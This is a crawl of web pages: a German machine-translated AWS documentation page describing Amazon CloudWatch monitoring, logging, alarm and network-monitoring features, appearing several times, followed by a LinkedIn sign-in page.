der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#BillingPointer | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-logs-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://www.linkedin.com/uas/login?session_redirect=%2Fproducts%2Ftechnarts-monicat%3FviewConnections%3Dtrue&trk=products_details_guest_face-pile-cta | LinkedIn Login, Sign in | LinkedIn Sign in Sign in with Apple Sign in with a passkey By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . or Email or phone Password Show Forgot password? Keep me logged in Sign in We’ve emailed a one-time link to your primary email address Click on the link to sign in instantly to your LinkedIn account. If you don’t see the email in your inbox, check your spam folder. Resend email Back New to LinkedIn? Join now Agree & Join LinkedIn By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . LinkedIn © 2026 User Agreement Privacy Policy Community Guidelines Cookie Policy Copyright Policy Send Feedback Language العربية (Arabic) বাংলা (Bangla) Čeština (Czech) Dansk (Danish) Deutsch (German) Ελληνικά (Greek) English (English) Español (Spanish) فارسی (Persian) Suomi (Finnish) Français (French) हिंदी (Hindi) Magyar (Hungarian) Bahasa Indonesia (Indonesian) Italiano (Italian) עברית (Hebrew) 日本語 (Japanese) 한국어 (Korean) मराठी (Marathi) Bahasa Malaysia (Malay) Nederlands (Dutch) Norsk (Norwegian) ਪੰਜਾਬੀ (Punjabi) Polski (Polish) Português (Portuguese) Română (Romanian) Русский (Russian) Svenska (Swedish) తెలుగు (Telugu) ภาษาไทย (Thai) Tagalog (Tagalog) Türkçe (Turkish) Українська (Ukrainian) Tiếng Việt (Vietnamese) 简体中文 (Chinese (Simplified)) 正體中文 (Chinese (Traditional)) | 2026-01-13T09:29:26 |
